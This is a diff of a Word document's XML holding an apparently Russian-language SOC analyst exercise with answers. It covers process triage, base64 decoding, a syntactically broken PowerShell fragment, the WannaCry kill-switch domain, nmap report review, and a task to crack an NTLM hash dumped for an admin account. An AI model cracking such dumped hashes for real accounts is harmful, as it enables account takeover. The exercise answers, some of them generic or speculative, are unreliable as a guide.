-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Проверка на вредоносное ПО:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Используйте предоставленные хеш-значения (MD5 и SHA-256) для поиска в базах данных аналитики угроз (например, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>VirusTotal</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>), чтобы определить, был ли этот конкретный файл помечен как вредоносный.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Репутация файла</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Если</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> хэши возвращают положительные результаты, указывающие на то, что он безопасен или распознан как легитимный файл, вы можете продолжить мониторинг. Если файл помечен как вредоносный, вы должны немедленно предпринять действия для изоляции затронутой системы.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Контекстная информация</w:t>
-      </w:r>
-      <w:r>
-        <w:t>: Происхождение файла</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Определите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, где находится файл (например, типичные пути установки или необычные каталоги). </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Родительский процесс: Проверьте, какой процесс запустил flashhelperservice.exe. Это может дать представление о том, был ли он инициирован легитимным приложением или чем-то подозрительным. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Анализ поведения</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Изучите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, какие действия предпринял процесс (например, сетевые подключения, изменения файлов) на основе телеметрии EDR. Ищите любые боковые перемещения или попытки связаться с внешними серверами. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Исторические данные</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Просмотрите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> журналы на предмет прошлых действий, связанных с этим процессом или похожими процессами.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Следующие шаги</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
         <w:t>Если процесс подтвержден как легитимный и необходимый, убедитесь, что он обновлен до последней версии, чтобы смягчить уязвимости.</w:t>
@@ -6479,15 +5209,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Заключение (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Conclusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>):</w:t>
+        <w:t>Заключение (Conclusion):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6512,23 +5234,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">В ходе расследования вы видите следующую </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">информацию:   </w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>хеш</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+        <w:t>В ходе расследования вы видите следующую информацию:   (хеш)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6565,14 +5271,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>import</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> base64</w:t>
+        <w:t>import base64</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6587,21 +5286,8 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve"># Base64 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>encoded</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t># Base64 encoded string</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6620,14 +5306,7 @@
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>encoded_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> = "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"</w:t>
+        <w:t>encoded_string = "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"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6682,34 +5361,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>decoded_bytes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = base64.b64decode(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>encoded_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>decoded_bytes = base64.b64decode(encoded_string)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6736,42 +5388,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>decoded_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>decoded_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>bytes.decode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>('utf-8', errors='ignore')</w:t>
+        <w:t>decoded_string = decoded_bytes.decode('utf-8', errors='ignore')</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6804,21 +5421,8 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>print</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>decoded_string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
+      <w:r>
+        <w:t>print(decoded_string)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6887,21 +5491,7 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">    $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exec_wraper_st</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = $input -Out-String</w:t>
+        <w:t xml:space="preserve">    $exec_wraper_st = $input -Out-String</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6919,105 +5509,15 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">     $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>splitt_part</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exec_wraper_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>st.Spliti</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>($</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exex_wraper_st.Length</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -eq $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exex_wraper_st.Length</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -eq 2) { throw "invalid payload" }</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Похоже, это фрагмент скрипта </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. Похоже, он обрабатывает ввод и проверяет некоторые условия длины строки, возможно, в целях безопасности или проверки.</w:t>
+        <w:t xml:space="preserve">     $splitt_part = $exec_wraper_st.Spliti($exex_wraper_st.Length -eq $exex_wraper_st.Length -eq 2) { throw "invalid payload" }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Похоже, это фрагмент скрипта PowerShell. Похоже, он обрабатывает ввод и проверяет некоторые условия длины строки, возможно, в целях безопасности или проверки.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7093,15 +5593,7 @@
         <w:t>Вредоносное ПО</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: Некоторые вирусы или вредоносные программы могут </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>masquerade</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (прятаться) под легитимными процессами и использовать их для запуска своих собственных процессов.</w:t>
+        <w:t>: Некоторые вирусы или вредоносные программы могут masquerade (прятаться) под легитимными процессами и использовать их для запуска своих собственных процессов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7189,29 +5681,8 @@
         </w:rPr>
         <w:t>Проверка целостности системы</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Запустите</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> команду </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sfc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>scannow</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> в командной строке для проверки и восстановления системных файлов.</w:t>
+      <w:r>
+        <w:t>: Запустите команду sfc /scannow в командной строке для проверки и восстановления системных файлов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7225,13 +5696,8 @@
         </w:rPr>
         <w:t>Обновление системы</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Убедитесь</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, что Windows и все установленные приложения обновлены.</w:t>
+      <w:r>
+        <w:t>: Убедитесь, что Windows и все установленные приложения обновлены.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7287,13 +5753,8 @@
         </w:rPr>
         <w:t>Блокировка брандмауэром</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Возможно</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, брандмауэр Windows или стороннее защитное ПО блокирует доступ приложения к сети.</w:t>
+      <w:r>
+        <w:t>: Возможно, брандмауэр Windows или стороннее защитное ПО блокирует доступ приложения к сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7310,13 +5771,8 @@
         </w:rPr>
         <w:t>Настройки прокси</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Если</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> вы используете прокси-сервер, приложение может не быть настроено для его использования.</w:t>
+      <w:r>
+        <w:t>: Если вы используете прокси-сервер, приложение может не быть настроено для его использования.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7351,13 +5807,8 @@
         </w:rPr>
         <w:t>Обновления или несовместимость</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Убедитесь</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>, что приложение обновлено до последней версии и совместимо с вашей версией операционной системы.</w:t>
+      <w:r>
+        <w:t>: Убедитесь, что приложение обновлено до последней версии и совместимо с вашей версией операционной системы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7374,13 +5825,8 @@
         </w:rPr>
         <w:t>Неисправные сетевые драйвера</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Иногда</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> проблема может быть связана с устаревшими или поврежденными драйверами сетевой карты.</w:t>
+      <w:r>
+        <w:t>: Иногда проблема может быть связана с устаревшими или поврежденными драйверами сетевой карты.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7428,39 +5874,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">URL "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" был забит </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Kryptos</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Logic. Это означает, что домен больше не доступен для обычного использования и, вероятно, связан с вредоносной деятельностью или угрозами. Пользователи, пытающиеся получить доступ к этому сайту, будут перенаправлены или заблокированы для предотвращения потенциального вреда.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">URL-адрес «www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com» в частности связан с атакой вируса-вымогателя </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WannaCry</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Этот домен был зарегистрирован исследователем безопасности как «аварийный выключатель», что эффективно остановило распространение вредоносного ПО. Когда вирус-вымогатель </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WannaCry</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> пытался подключиться к этому домену, он выходил из системы вместо того, чтобы заражать хост-систему, тем самым предотвращая дальнейшее заражение</w:t>
+        <w:t>URL "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" был забит Kryptos Logic. Это означает, что домен больше не доступен для обычного использования и, вероятно, связан с вредоносной деятельностью или угрозами. Пользователи, пытающиеся получить доступ к этому сайту, будут перенаправлены или заблокированы для предотвращения потенциального вреда.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>URL-адрес «www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com» в частности связан с атакой вируса-вымогателя WannaCry. Этот домен был зарегистрирован исследователем безопасности как «аварийный выключатель», что эффективно остановило распространение вредоносного ПО. Когда вирус-вымогатель WannaCry пытался подключиться к этому домену, он выходил из системы вместо того, чтобы заражать хост-систему, тем самым предотвращая дальнейшее заражение</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7476,31 +5898,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Функциональность аварийного выключателя: домен имел решающее значение для остановки распространения вируса-вымогателя </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WannaCry</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. Зарегистрировав этот домен, исследователи создали воронку, которая перенаправляла трафик с зараженных машин, эффективно нейтрализуя угрозу</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Ассоциация с вредоносным ПО: URL-адрес встроен в код вируса-вымогателя </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>WannaCry</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> и был разработан для облегчения его распространения путем проверки наличия подключения к нему. Если он недоступен, вредоносное ПО продолжало процесс заражения</w:t>
+        <w:t>Функциональность аварийного выключателя: домен имел решающее значение для остановки распространения вируса-вымогателя WannaCry. Зарегистрировав этот домен, исследователи создали воронку, которая перенаправляла трафик с зараженных машин, эффективно нейтрализуя угрозу</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ассоциация с вредоносным ПО: URL-адрес встроен в код вируса-вымогателя WannaCry и был разработан для облегчения его распространения путем проверки наличия подключения к нему. Если он недоступен, вредоносное ПО продолжало процесс заражения</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7528,36 +5934,20 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Что вы можете сказать об этом отчете сканирования </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">?  Есть ли в этом отчете какие-либо проблемы безопасности? </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Отчет о сканировании </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> предоставляет важную информацию о состоянии сети и выявляет потенциальные проблемы безопасности. Чтобы оценить, есть ли в отчете какие-либо уязвимости, необходимо учитывать несколько ключевых аспектов.</w:t>
+        <w:t xml:space="preserve">Что вы можете сказать об этом отчете сканирования nmap?  Есть ли в этом отчете какие-либо проблемы безопасности? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Отчет о сканировании Nmap предоставляет важную информацию о состоянии сети и выявляет потенциальные проблемы безопасности. Чтобы оценить, есть ли в отчете какие-либо уязвимости, необходимо учитывать несколько ключевых аспектов.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7571,16 +5961,8 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">Основные аспекты отчета </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Основные аспекты отчета Nmap</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7659,15 +6041,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> поддерживает различные методы сканирования, такие как TCP SYN, FIN и NULL. Некоторые из этих методов могут быть менее надежными в определенных сетевых условиях, что может привести к ложным результатам</w:t>
+        <w:t xml:space="preserve">        Nmap поддерживает различные методы сканирования, такие как TCP SYN, FIN и NULL. Некоторые из этих методов могут быть менее надежными в определенных сетевых условиях, что может привести к ложным результатам</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7691,55 +6065,15 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">    Дополнительные скрипты </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> также позволяет использовать NSE (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Scripting</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Engine) для выполнения дополнительных проверок и тестов на уязвимости. Скрипты могут помочь в выявлении специфических проблем безопасности, таких как открытые базы данных или уязвимости к SQL-инъекциям</w:t>
+        <w:t xml:space="preserve">    Дополнительные скрипты Nmap:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">        Nmap также позволяет использовать NSE (Nmap Scripting Engine) для выполнения дополнительных проверок и тестов на уязвимости. Скрипты могут помочь в выявлении специфических проблем безопасности, таких как открытые базы данных или уязвимости к SQL-инъекциям</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7755,15 +6089,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">    Открытые порты</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>: Если</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> отчет показывает множество открытых портов, это может свидетельствовать о потенциальных точках входа для злоумышленников.</w:t>
+        <w:t xml:space="preserve">    Открытые порты: Если отчет показывает множество открытых портов, это может свидетельствовать о потенциальных точках входа для злоумышленников.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7797,15 +6123,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Таким образом, анализируя отчет </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, важно обращать внимание на состояние портов, версии служб и используемые методы сканирования для выявления возможных проблем безопасности в сети.</w:t>
+        <w:t>Таким образом, анализируя отчет Nmap, важно обращать внимание на состояние портов, версии служб и используемые методы сканирования для выявления возможных проблем безопасности в сети.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7822,28 +6140,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Восстановите пароль из </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>хеша</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>fmarket.stf\admin:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>1337:aad</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>3b435b51404eeaad3b435b51404ee:bebaecb23aa18f5375628541ff3fb3b8:::</w:t>
+        <w:t>Восстановите пароль из хеша</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>fmarket.stf\admin:1337:aad3b435b51404eeaad3b435b51404ee:bebaecb23aa18f5375628541ff3fb3b8:::</w:t>
       </w:r>
     </w:p>
     <w:p>
